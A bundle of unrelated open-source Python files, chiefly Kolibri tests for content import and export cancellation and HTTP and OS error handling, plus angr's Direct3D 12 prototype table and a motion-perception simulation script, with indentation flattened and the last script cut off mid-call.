@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_remote_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileDownloadMock, local_path_mock, remote_path_mock, start_progress_mock,
annotation_mock):
# If transfer is cancelled during transfer of first file
local_path = tempfile.mkstemp()[1]
local_path_mock.return_value = local_path
remote_path_mock.return_value = 'notest'
# Mock this __iter__ so that the filetransfer can be looped over
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "network", self.the_channel_id)
# is_cancelled should be called thrice.
is_cancelled_mock.assert_has_calls([call(), call(), call()])
# Should be set to the local path we mocked
FileDownloadMock.assert_called_with('notest', local_path)
# Check that it was cancelled when the command was cancelled, this ensures cleanup
FileDownloadMock.assert_has_calls([call().cancel()])
# Check that the command itself was also cancelled.
cancel_mock.assert_called_with()
annotation_mock.mark_local_files_as_available.assert_not_called()
annotation_mock.set_leaf_node_availability_from_local_file_availability.assert_not_called()
annotation_mock.recurse_availability_up_tree.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileDownload')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled',
side_effect=[False, False, False, False, False, True, True, True])
def test_remote_cancel_after_file_copy_file_not_deleted(self, is_cancelled_mock, cancel_mock, FileDownloadMock, local_path_mock, remote_path_mock,
start_progress_mock, annotation_mock):
# If transfer is cancelled after transfer of first file
local_path_1 = tempfile.mkstemp()[1]
local_path_2 = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_path_1, local_path_2]
remote_path_mock.return_value = 'notest'
# Mock this __iter__ so that the filetransfer can be looped over
FileDownloadMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "network", self.the_channel_id)
# Check that the command itself was also cancelled.
cancel_mock.assert_called_with()
# Check that the temp file we created where the first file was being downloaded to has not been deleted
self.assertTrue(os.path.exists(local_path_1))
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', return_value=True)
def test_local_cancel_immediately(self, is_cancelled_mock, cancel_mock, FileCopyMock, annotation_mock):
# Local version of test above
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "disk", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call()])
FileCopyMock.assert_not_called()
cancel_mock.assert_called_with()
annotation_mock.mark_local_files_as_available.assert_not_called()
annotation_mock.set_leaf_node_availability_from_local_file_availability.assert_not_called()
annotation_mock.recurse_availability_up_tree.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_local_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock, annotation_mock):
# Local version of test above
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_dest_path, local_src_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("importcontent", "disk", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call(), call()])
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
FileCopyMock.assert_has_calls([call().cancel()])
cancel_mock.assert_called_with()
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.len')
@patch('kolibri.core.content.utils.transfer.Transfer.next', side_effect=ConnectionError('connection error'))
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_remote_cancel_during_connect_error(self, is_cancelled_mock, cancel_mock, next_mock, len_mock, annotation_mock):
call_command('importcontent', 'network', self.the_channel_id, node_ids=['32a941fb77c2576e8f6b294cde4c3b0c'])
cancel_mock.assert_called_with()
len_mock.assert_not_called()
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
def test_remote_import_httperror_404(self, path_mock, logging_mock, start_progress_mock, annotation_mock):
local_dest_path_1 = tempfile.mkstemp()[1]
local_dest_path_2 = tempfile.mkstemp()[1]
local_dest_path_3 = tempfile.mkstemp()[1]
path_mock.side_effect = [local_dest_path_1, local_dest_path_2, local_dest_path_3]
call_command('importcontent', 'network', self.the_channel_id, node_ids=['2b6926ed22025518a8b9da91745b51d3'], renderable_only=False)
self.assertTrue(logging_mock.call_count == 3)
self.assertTrue('404' in logging_mock.call_args_list[0][0][0])
@patch('kolibri.core.content.management.commands.importcontent.sleep')
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, False, True, True, True])
def test_remote_import_httperror_502(self, is_cancelled_mock, cancel_mock, url_mock, logging_mock, sleep_mock, annotation_mock):
url_mock.return_value = 'http://httpbin.org/status/502'
call_command('importcontent', 'network', self.the_channel_id)
cancel_mock.assert_called_with()
annotation_mock.set_availability.assert_called()
sleep_mock.assert_called_once()
self.assertTrue('502' in logging_mock.call_args_list[0][0][0])
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_remote_url')
def test_remote_import_httperror_500(self, url_mock, logging_mock, annotation_mock):
url_mock.return_value = 'http://httpbin.org/status/500'
with self.assertRaises(HTTPError):
call_command('importcontent', 'network', self.the_channel_id)
self.assertTrue('500' in logging_mock.call_args_list[0][0][0])
annotation_mock.set_availability.assert_not_called()
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.importcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True])
def test_local_import_oserror_dne(self, is_cancelled_mock, cancel_mock, path_mock, logging_mock, start_progress_mock, annotation_mock):
dest_path = tempfile.mkstemp()[1]
path_mock.side_effect = [dest_path, '/test/dne']
call_command('importcontent', 'disk', self.the_channel_id, 'destination')
self.assertTrue('No such file or directory' in logging_mock.call_args_list[0][0][0])
annotation_mock.set_availability.assert_called()
@patch('kolibri.core.content.management.commands.importcontent.logging.error')
@patch('kolibri.core.content.utils.transfer.os.path.getsize')
@patch('kolibri.core.content.management.commands.importcontent.paths.get_content_storage_file_path')
def test_local_import_oserror_permission_denied(self, path_mock, getsize_mock, logging_mock, annotation_mock):
dest_path = tempfile.mkstemp()[1]
path_mock.side_effect = [dest_path, '/test/dne']
getsize_mock.side_effect = ['1', OSError('Permission denied')]
with self.assertRaises(OSError):
call_command('importcontent', 'disk', self.the_channel_id, 'destination')
self.assertTrue('Permission denied' in logging_mock.call_args_list[0][0][0])
annotation_mock.assert_not_called()
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ExportChannelTestCase(TestCase):
"""
Test case for the exportchannel management command.
"""
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
@patch('kolibri.core.content.management.commands.exportchannel.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.exportchannel.paths.get_content_database_file_path')
@patch('kolibri.core.content.management.commands.exportchannel.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.exportchannel.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.exportchannel.AsyncCommand.is_cancelled', return_value=True)
def test_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock):
# Make sure we clean up a database file that is canceled during export
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_src_path, local_dest_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("exportchannel", self.the_channel_id, local_dest_path)
is_cancelled_mock.assert_called_with()
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
cancel_mock.assert_called_with()
self.assertFalse(os.path.exists(local_dest_path))
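The tests above stack several `@patch` decorators; `unittest.mock` applies them bottom-up, so the decorator closest to the function supplies the first mock argument (which is why `is_cancelled_mock` comes first in each signature). A minimal stand-alone sketch of that ordering, using hypothetical patch targets:

```python
from unittest.mock import patch

# Stacked @patch decorators apply bottom-up: the decorator closest to
# the function supplies the first injected mock argument.
@patch("os.path.exists")   # -> second mock argument
@patch("os.path.getsize")  # -> first mock argument
def probe(getsize_mock, exists_mock):
    # The two injected mocks are distinct objects.
    return getsize_mock is not exists_mock

print(probe())  # True
```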
@override_option("Paths", "CONTENT_DIR", tempfile.mkdtemp())
class ExportContentTestCase(TestCase):
"""
Test case for the exportcontent management command.
"""
fixtures = ['content_test.json']
the_channel_id = '6199dde695db4ee4ab392222d5af1e5c'
@patch('kolibri.core.content.management.commands.exportcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.is_cancelled', return_value=True)
def test_local_cancel_immediately(self, is_cancelled_mock, cancel_mock, FileCopyMock):
# If cancel comes in before we do anything, make sure nothing happens!
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("exportcontent", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call()])
FileCopyMock.assert_not_called()
cancel_mock.assert_called_with()
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.start_progress')
@patch('kolibri.core.content.management.commands.exportcontent.paths.get_content_storage_file_path')
@patch('kolibri.core.content.management.commands.exportcontent.transfer.FileCopy')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.cancel')
@patch('kolibri.core.content.management.commands.exportcontent.AsyncCommand.is_cancelled', side_effect=[False, True, True, True])
def test_local_cancel_during_transfer(self, is_cancelled_mock, cancel_mock, FileCopyMock, local_path_mock, start_progress_mock):
# Make sure we cancel during transfer
local_dest_path = tempfile.mkstemp()[1]
local_src_path = tempfile.mkstemp()[1]
local_path_mock.side_effect = [local_src_path, local_dest_path]
FileCopyMock.return_value.__iter__.return_value = ['one', 'two', 'three']
call_command("exportcontent", self.the_channel_id, tempfile.mkdtemp())
is_cancelled_mock.assert_has_calls([call(), call(), call()])
FileCopyMock.assert_called_with(local_src_path, local_dest_path)
FileCopyMock.assert_has_calls([call().cancel()])
cancel_mock.assert_called_with()
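Throughout these tests, cancellation is scripted by giving `is_cancelled` a `side_effect` list: each successive call to the mock returns the next value in the list. A self-contained sketch of that pattern (the polling loop is illustrative, not the command's real loop):

```python
from unittest.mock import MagicMock

# Successive calls return the scripted values in order, mimicking a
# task that reports "not cancelled" twice, then "cancelled".
is_cancelled = MagicMock(side_effect=[False, False, True])

polls = []
while True:
    cancelled = is_cancelled()
    polls.append(cancelled)
    if cancelled:
        break

print(polls)  # [False, False, True]
```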
# File: calc.py (repo: kumarpugazhenthi/PetPy, license: MIT)
import numpy as np
def density(mass, volume):
    """Return density as mass divided by volume."""
    return mass / volume
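A quick usage sketch of `density()`; the numeric values are illustrative only:

```python
def density(mass, volume):
    # Density is mass per unit volume.
    return mass / volume

print(density(10.0, 2.0))  # 5.0
```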
# File: angr/procedures/definitions/win32_d3d12.py (repo: r4b3rt/angr, license: BSD-2-Clause)
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("d3d12.dll")
prototypes = \
{
#
'D3D12SerializeRootSignature': SimTypeFunction([SimTypePointer(SimStruct({"NumParameters": SimTypeInt(signed=False, label="UInt32"), "pParameters": SimTypePointer(SimStruct({"ParameterType": SimTypeInt(signed=False, label="D3D12_ROOT_PARAMETER_TYPE"), "Anonymous": SimUnion({"DescriptorTable": SimStruct({"NumDescriptorRanges": SimTypeInt(signed=False, label="UInt32"), "pDescriptorRanges": SimTypePointer(SimStruct({"RangeType": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_TYPE"), "NumDescriptors": SimTypeInt(signed=False, label="UInt32"), "BaseShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "OffsetInDescriptorsFromTableStart": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_DESCRIPTOR_RANGE", pack=False, align=None), offset=0)}, name="D3D12_ROOT_DESCRIPTOR_TABLE", pack=False, align=None), "Constants": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Num32BitValues": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_CONSTANTS", pack=False, align=None), "Descriptor": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_DESCRIPTOR", pack=False, align=None)}, name="<anon>", label="None"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_ROOT_PARAMETER", pack=False, align=None), offset=0), "NumStaticSamplers": SimTypeInt(signed=False, label="UInt32"), "pStaticSamplers": SimTypePointer(SimStruct({"Filter": SimTypeInt(signed=False, label="D3D12_FILTER"), "AddressU": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressV": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressW": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "MipLODBias": SimTypeFloat(size=32), "MaxAnisotropy": SimTypeInt(signed=False, 
label="UInt32"), "ComparisonFunc": SimTypeInt(signed=False, label="D3D12_COMPARISON_FUNC"), "BorderColor": SimTypeInt(signed=False, label="D3D12_STATIC_BORDER_COLOR"), "MinLOD": SimTypeFloat(size=32), "MaxLOD": SimTypeFloat(size=32), "ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_STATIC_SAMPLER_DESC", pack=False, align=None), offset=0), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_SIGNATURE_FLAGS")}, name="D3D12_ROOT_SIGNATURE_DESC", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="D3D_ROOT_SIGNATURE_VERSION"), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pRootSignature", "Version", "ppBlob", "ppErrorBlob"]),
#
'D3D12CreateRootSignatureDeserializer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSrcData", "SrcDataSizeInBytes", "pRootSignatureDeserializerInterface", "ppRootSignatureDeserializer"]),
#
'D3D12SerializeVersionedRootSignature': SimTypeFunction([SimTypePointer(SimStruct({"Version": SimTypeInt(signed=False, label="D3D_ROOT_SIGNATURE_VERSION"), "Anonymous": SimUnion({"Desc_1_0": SimStruct({"NumParameters": SimTypeInt(signed=False, label="UInt32"), "pParameters": SimTypePointer(SimStruct({"ParameterType": SimTypeInt(signed=False, label="D3D12_ROOT_PARAMETER_TYPE"), "Anonymous": SimUnion({"DescriptorTable": SimStruct({"NumDescriptorRanges": SimTypeInt(signed=False, label="UInt32"), "pDescriptorRanges": SimTypePointer(SimStruct({"RangeType": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_TYPE"), "NumDescriptors": SimTypeInt(signed=False, label="UInt32"), "BaseShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "OffsetInDescriptorsFromTableStart": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_DESCRIPTOR_RANGE", pack=False, align=None), offset=0)}, name="D3D12_ROOT_DESCRIPTOR_TABLE", pack=False, align=None), "Constants": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Num32BitValues": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_CONSTANTS", pack=False, align=None), "Descriptor": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_DESCRIPTOR", pack=False, align=None)}, name="<anon>", label="None"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_ROOT_PARAMETER", pack=False, align=None), offset=0), "NumStaticSamplers": SimTypeInt(signed=False, label="UInt32"), "pStaticSamplers": SimTypePointer(SimStruct({"Filter": SimTypeInt(signed=False, label="D3D12_FILTER"), "AddressU": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressV": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressW": SimTypeInt(signed=False, 
label="D3D12_TEXTURE_ADDRESS_MODE"), "MipLODBias": SimTypeFloat(size=32), "MaxAnisotropy": SimTypeInt(signed=False, label="UInt32"), "ComparisonFunc": SimTypeInt(signed=False, label="D3D12_COMPARISON_FUNC"), "BorderColor": SimTypeInt(signed=False, label="D3D12_STATIC_BORDER_COLOR"), "MinLOD": SimTypeFloat(size=32), "MaxLOD": SimTypeFloat(size=32), "ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_STATIC_SAMPLER_DESC", pack=False, align=None), offset=0), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_SIGNATURE_FLAGS")}, name="D3D12_ROOT_SIGNATURE_DESC", pack=False, align=None), "Desc_1_1": SimStruct({"NumParameters": SimTypeInt(signed=False, label="UInt32"), "pParameters": SimTypePointer(SimStruct({"ParameterType": SimTypeInt(signed=False, label="D3D12_ROOT_PARAMETER_TYPE"), "Anonymous": SimUnion({"DescriptorTable": SimStruct({"NumDescriptorRanges": SimTypeInt(signed=False, label="UInt32"), "pDescriptorRanges": SimTypePointer(SimStruct({"RangeType": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_TYPE"), "NumDescriptors": SimTypeInt(signed=False, label="UInt32"), "BaseShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Flags": SimTypeInt(signed=False, label="D3D12_DESCRIPTOR_RANGE_FLAGS"), "OffsetInDescriptorsFromTableStart": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_DESCRIPTOR_RANGE1", pack=False, align=None), offset=0)}, name="D3D12_ROOT_DESCRIPTOR_TABLE1", pack=False, align=None), "Constants": SimStruct({"ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Num32BitValues": SimTypeInt(signed=False, label="UInt32")}, name="D3D12_ROOT_CONSTANTS", pack=False, align=None), "Descriptor": SimStruct({"ShaderRegister": SimTypeInt(signed=False, 
label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_DESCRIPTOR_FLAGS")}, name="D3D12_ROOT_DESCRIPTOR1", pack=False, align=None)}, name="<anon>", label="None"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_ROOT_PARAMETER1", pack=False, align=None), offset=0), "NumStaticSamplers": SimTypeInt(signed=False, label="UInt32"), "pStaticSamplers": SimTypePointer(SimStruct({"Filter": SimTypeInt(signed=False, label="D3D12_FILTER"), "AddressU": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressV": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "AddressW": SimTypeInt(signed=False, label="D3D12_TEXTURE_ADDRESS_MODE"), "MipLODBias": SimTypeFloat(size=32), "MaxAnisotropy": SimTypeInt(signed=False, label="UInt32"), "ComparisonFunc": SimTypeInt(signed=False, label="D3D12_COMPARISON_FUNC"), "BorderColor": SimTypeInt(signed=False, label="D3D12_STATIC_BORDER_COLOR"), "MinLOD": SimTypeFloat(size=32), "MaxLOD": SimTypeFloat(size=32), "ShaderRegister": SimTypeInt(signed=False, label="UInt32"), "RegisterSpace": SimTypeInt(signed=False, label="UInt32"), "ShaderVisibility": SimTypeInt(signed=False, label="D3D12_SHADER_VISIBILITY")}, name="D3D12_STATIC_SAMPLER_DESC", pack=False, align=None), offset=0), "Flags": SimTypeInt(signed=False, label="D3D12_ROOT_SIGNATURE_FLAGS")}, name="D3D12_ROOT_SIGNATURE_DESC1", pack=False, align=None)}, name="<anon>", label="None")}, name="D3D12_VERSIONED_ROOT_SIGNATURE_DESC", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0), SimTypePointer(SimTypeBottom(label="ID3DBlob"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pRootSignature", "ppBlob", "ppErrorBlob"]),
#
'D3D12CreateVersionedRootSignatureDeserializer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSrcData", "SrcDataSizeInBytes", "pRootSignatureDeserializerInterface", "ppRootSignatureDeserializer"]),
#
'D3D12CreateDevice': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypeInt(signed=False, label="D3D_FEATURE_LEVEL"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAdapter", "MinimumFeatureLevel", "riid", "ppDevice"]),
#
'D3D12GetDebugInterface': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "ppvDebug"]),
#
'D3D12EnableExperimentalFeatures': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="Void"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["NumFeatures", "pIIDs", "pConfigurationStructs", "pConfigurationStructSizes"]),
}
lib.set_prototypes(prototypes)
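Each entry in the table above pairs a Win32 export with a `SimTypeFunction` whose `arg_names` give positional meaning to the arguments. A plain-Python stand-in (not the angr API; the structure is deliberately simplified) showing how such a name-keyed prototype table supports argument lookup:

```python
# Stand-in for the name -> prototype lookup that lib.set_prototypes()
# enables; the real values are angr SimTypeFunction objects.
prototypes = {
    "D3D12GetDebugInterface": {
        "arg_names": ["riid", "ppvDebug"],
        "return_type": "Int32",
    },
}

def arg_index(func_name, arg_name):
    # Position of a named argument within the function's prototype.
    return prototypes[func_name]["arg_names"].index(arg_name)

print(arg_index("D3D12GetDebugInterface", "ppvDebug"))  # 1
```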
# File: Models/common/__init__.py (repo: akanimax/toxic-comment-identification-tensorflow, license: MIT)
"""Common module needed by all subsequently trained models.
"""
from __future__ import print_function
from __future__ import division
# File: WrightSim/hamiltonian/__init__.py (repo: wright-group/WrightSim, license: MIT)
from .default import Hamiltonian
from .TRSF_default import Hamiltonian as Hamiltonian_TRSF
# File: scripts/experiment_SI_controls.py (repo: laurentperrinet/KhoeiMassonPerrinet_2017_PLoSCB, license: MIT)
"""
A bunch of control runs
"""
import MotionParticlesFLE as mp
gen_dot = mp.generate_dot
import numpy as np
import os
from default_param import *
image = {}
experiment = 'SI'
N_scan = 5
base = 10.
#mp.N_trials = 4
for stimulus_tag, im_arg in zip(stim_labels, stim_args):
#for stimulus_tag, im_arg in zip(stim_labels[1], stim_args[1]):
#for D_x, D_V, label in zip([mp.D_x, PBP_D_x], [mp.D_V, PBP_D_V], ['MBP', 'PBP']):
for D_x, D_V, label in zip([mp.D_x], [mp.D_V], ['MBP']):
im_arg.update(D_V=D_V, D_x=D_x)
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
D_x=im_arg['D_x']*np.logspace(-2, 2, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
D_V=im_arg['D_V']*np.logspace(-2, 2, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
sigma_motion=mp.sigma_motion*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
K_motion=mp.K_motion*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
dot_size=im_arg['dot_size']*np.logspace(-1., 1., N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
sigma_I=mp.sigma_I*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
im_noise=mp.im_noise*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
sigma_noise=mp.sigma_noise*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
os.path.join(mp.figpath, experiment + '-' + stimulus_tag + '-' + label),
N_X, N_Y, N_frame, gen_dot, order=None, do_figure=do_figure, do_video=do_video, N_quant_X=N_quant_X, N_quant_Y=N_quant_Y,
fixed_args=im_arg,
p_epsilon=mp.p_epsilon*np.logspace(-1, 1, N_scan, base=base))
_ = mp.figure_image_variable(
